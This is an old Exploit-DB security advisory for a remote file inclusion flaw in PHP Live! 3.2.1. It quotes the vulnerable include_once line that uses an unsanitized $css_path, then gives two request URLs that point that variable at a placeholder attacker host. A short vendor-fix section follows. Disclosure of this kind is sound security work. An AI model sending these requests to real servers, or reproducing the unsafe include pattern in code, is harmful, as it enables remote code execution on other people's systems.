PHP Live! 3.2.1 - 'help.php' Remote File Inclusion

EDB-ID:

2060

Author:

magnific

Type:

webapps

Platform:

PHP

Published:

2006-07-23

     Advisory: PHPLive 3.2 Remote Injection Vulnerability
 Release Date: 2006/07/23
       Author: magnific
   Discovered: aneurysm.inc security reserach
         Risk: High
Vendor Status: not contacted | no patch available
  Vendor Site: www.osicodes.com
      Contact: aneurysm_inc[at]hotmail[dot]com
      Version: all

-----------
Overview:

Some variables are not properly sanitized before being used.
Here you will find the variables not properly sanitized:

-----------
Vulnerable code:

help.php /setup/header.php etc..

<? $css_path = ( !isset( $css_path ) ) ? $css_path = "./" : $css_path ; include_once( $css_path."css/default.php" ) ; ?>

-----------
Execution:

help.php?css_path=htt://attacker
setup/header.php?css_path=htt://attacker


-----------
Vendor:

At the moment, there are no solutions from the vendor. If you want to make
sure the code and your PHPLIVE you have to sanitize the variable $css_path,
in all files affecteds.
Active SAFE_MODE on server, for local security.

---------------------------
aneurysm.inc security reserach
irc.gigachat.net
#aneurysm.inc
---------------------------

# milw0rm.com [2006-07-23]